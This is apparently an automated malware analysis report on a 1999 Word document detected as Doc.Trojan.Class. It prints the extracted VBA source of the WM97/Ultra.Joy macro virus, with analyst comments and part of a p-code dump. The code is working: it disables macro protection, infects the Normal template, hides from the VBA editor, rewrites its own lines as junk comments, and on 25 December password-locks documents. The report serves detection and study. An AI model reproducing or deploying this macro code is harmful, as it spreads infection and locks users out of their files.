Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 efa0c95ef0aa9842…

MALICIOUS

Office (OLE)

37.0 KB Created: 1999-02-22 07:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 794c08e326cbddf965bf35036dd0a616 SHA-1: 1e4237422e1a98ef9d0b3375579ac58647f020db SHA-256: efa0c95ef0aa98420ea4530b3ab9038387747ee3d8ce774b358952768e497d82
240 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The document body provides detailed instructions for removing the Happy99.exe malware, indicating the file itself is likely a lure or part of a malware infection chain. The presence of AutoOpen and AutoClose macros, along with legacy WordBasic markers, suggests malicious VBA code was used to execute or facilitate the infection. The ClamAV detections further confirm the malicious nature of the file.

Heuristics 5

  • ClamAV: Doc.Trojan.Class-39 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-39
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14487 bytes
SHA-256: cfa6ae23745ec8cbc81e222ed5de3e31f98fe33b0555420b4e4b231148cf0726
Detection
ClamAV: Doc.Trojan.Class-16
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' NOTE(analyst): standard module header written by the exporter (olevba per the
' artifact table above). The code lives in the document's ThisDocument class
' module; VB_Base names Normal.ThisDocument, i.e. the module is template-derived.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
' NOTE(analyst): the procedure name alone makes this run when the document is
' opened (OLE_VBA_AUTOOPEN). The code below is reproduced verbatim from the
' extracted module; the comments are analysis notes only.

Dim rsx, rox, xix, xxi As Integer: Dim xxe, xex, exx, exd, cxi, cix, xic, eox, xoe, oxe, cii, rxe, rex, exr, nix, ixn, nxi, lnr, nrl, rnl As String
' In VBA only the last name of each list takes the declared type; the others are
' Variant. The p-code dump further down agrees (only xxi is "As Integer").

Randomize

On Error GoTo 79
' Any runtime error jumps to label 79 near the end, so partial failures are silent.

Options.VirusProtection = Chr(48)
' Chr(48) is "0": switches off Word's macro virus protection prompt. A write to
' Options.VirusProtection is a classic macro-virus indicator for detection rules.

Options.SaveNormalPrompt = Chr(48)
' Suppresses the "save changes to Normal?" prompt so the template can be changed silently.

Options.ConfirmConversions = Chr(48)

rt = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
' Line count of the first module of the active document's VBA project.
' Cos(Atn(CInt(1))) evaluates to about 0.707; presumably coerced to index 1 when
' passed to Item() - confirm against the VBE object model. The expression is just
' a disguised constant 1.

dt = NormalTemplate.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
' Same for Normal.dot. rt/dt act as "already carries code?" flags below.

If dt > 0 And rt > 0 Then GoTo 79
' Both the document and the Normal template already hold code: skip to the end.

If dt = 0 Then
' Normal template is clean: the document's module is copied into it.

    Set Joy = NormalTemplate.VBProject.VBComponents

    Set hst = ActiveDocument.VBProject.VBComponents

    If Month(Now()) = 10 And Day(Now()) = 23 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83) + Chr(32) + Chr(83) + Chr(65) + Chr(89) + Chr(83) + Chr(32) + Chr(72) + Chr(73)
    ' Date-triggered payload (23 Oct): the Chr() chain decodes to "      ViRuS SAYS HI".

    If Month(Now()) = 11 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(74) + Chr(79) + Chr(89)
    ' 24 Nov: decodes to "    CLASS JOY" (cf. the ClamAV "Class" family name above).

    If Month(Now()) = 12 And Day(Now()) = 25 Then Application.ActiveDocument.Password = "Ultra.Joy"
    ' 25 Dec: sets a document open password, locking the user out of their own file.

    hst.Item(Cos(Atn(CInt(1)))).Name = Joy.Item(Cos(Atn(CInt(1)))).Name
    ' Renames the document module to match the Normal template's first module.

    hst.Item(Cos(Atn(CInt(1)))).Export Application.StartupPath & System.Version & Chr(74) + Chr(79) + Chr(89)
    ' Exports the module to Word's startup folder as "<System.Version>JOY"
    ' (Chr(74)+Chr(79)+Chr(89) = "JOY"). A new file in the Word startup path is
    ' the observable host artifact of this step.
    
End If

If rt = 0 Then Set Joy = ActiveDocument.VBProject.VBComponents
' Document is clean while the Normal template already carries code: the document
' becomes the target instead.

Joy.Item(Cos(Atn(CInt(1)))).codemodule.AddFromFile Application.StartupPath & System.Version & Chr(74) + Chr(79) + Chr(89)
' Imports the exported file into the target module - the replication step itself.

With Joy.Item(Cos(Atn(CInt(1)))).codemodule
' Chr(49)..Chr(52) = "1".."4": the loop deletes line 1 four times, presumably to
' strip the header lines the imported file carries (confirm against the file).

    For j = Chr(49) To Chr(52)

    .deletelines Chr(49)

    Next j

    End With

If dt = 0 Then Joy.Item(Cos(Atn(CInt(1)))).codemodule.replaceline 1, "Sub AutoClose()"
' In the Normal-template copy the entry point is renamed to AutoClose, so it also
' fires when documents are closed (OLE_VBA_AUTOCLOSE).

If dt = 0 Then Joy.Item(Cos(Atn(CInt(1)))).codemodule.replaceline 85, "Sub ToolsMarco()"
' Line 85 of the copy is not visible in this preview; the name (note the spelling)
' presumably aims at Word's Tools > Macro command - confirm before relying on it.

If dt = 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
' Persists the modified document in place.

With Joy.Item(Cos(Atn(CInt(1)))).codemodule
' Junk-comment rewrite: every other line of the freshly written module (Chr(50) =
' "2": start at 2, step 2) is replaced by a comment line (Chr(39) = "'") built from
' randomly offset characters, so each copy differs byte-wise. The "Obfuscation or
' payload: unlikely" flag in this report should be read with this loop in mind.

   For j = Chr(50) To Joy.Item(Cos(Atn(CInt(1)))).codemodule.countoflines Step Chr(50)

    rsx = Int(Rnd(11) * 2998) + 24: rox = Int(Rnd(15) * 5863) + 33: xix = Int(Rnd(44) * 3544) + 55
    ' Three random integers per iteration; xxi is never assigned, so cxi below is
    ' derived from an uninitialised Integer (0).

    cii = Asc(rsx): eox = Chr$(cii + 5): xoe = Chr$(cii - 14): oxe = Chr$(cii + 22): lnr = Chr$(cii - 4)
    ' Asc() of a number: VBA coerces it to its decimal string and returns the code
    ' of the first digit; the +/- offsets then derive the filler characters.

    cix = Asc(rox): rxe = Chr$(cix + 7): rex = Chr$(cix - 16): exr = Chr$(cix + 4): nrl = Chr$(cix - 17)

    xic = Asc(xix): nix = Chr$(xic + 9): ixn = Chr$(xic - 18): nxi = Chr$(xic + 8): rnl = Chr$(xic - 33)
    
    cxi = Asc(xxi): xxe = Chr$(cxi + 4): xex = Chr$(cxi - 3): exx = Chr$(cxi + 18): exd = Chr$(cxi - 12)

    .replaceline j, Chr(39) & eox & rxe & nix & xoe & rex & ixn & oxe & exr & nix & lnr & nrl & rnl & xxe & xex & exx & exd & xoe & rex & ixn & oxe & exr & nix & rnl & xxe & xex & exx & exd & xoe & eox & rxe & nix & xoe & rex

   Next j

End With

79:
' Error-handler / early-exit label (see On Error GoTo 79 at the top).

If dt <> 0 And rt = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
' Document newly written from an already-infected Normal template: save in place.

End Sub

' NOTE(analyst): empty procedure named after Word's built-in ViewVBCode command;
' presumably defined so that opening the VBA editor from the menu runs this no-op
' instead (a stealth measure) - confirm in Word's command-override behaviour.
' The inline comment is the author's own tag, WM97/Ultra.Joy, which matches the
' "Ultra.Joy" password string set in AutoOpen.
Sub ViewVBCode() 'WM97/Ultra.Joy by Virus :) Smile

End Sub


' Processing file: /opt/analyzer/scan_staging/545c24d8c934416c9228baee2eefab0b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 6666 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' Line #2:
' 	Dim 
' 	VarDefn rsx
' 	VarDefn rox
' 	VarDefn xix
' 	VarDefn xxi (As Integer)
' 	BoS 0x0000 
' 	Dim 
' 	VarDefn xxe
' 	VarDefn xex
' 	VarDefn exx
' 	VarDefn exd
' 	VarDefn cxi
' 	VarDefn cix
' 	VarDefn xic
' 	VarDefn eox
' 	VarDefn xoe
' 	VarDefn oxe
' 	VarDefn cii
' 	VarDefn rxe
' 	VarDefn rex
' 	VarDefn exr
' 	VarDefn nix
' 	VarDefn ixn
' 	VarDefn nxi
' 	VarDefn lnr
' 	VarDefn nrl
' 	VarDefn rnl (As String)
' Line #3:
' Line #4:
' 	ArgsCall Read 0
... (truncated)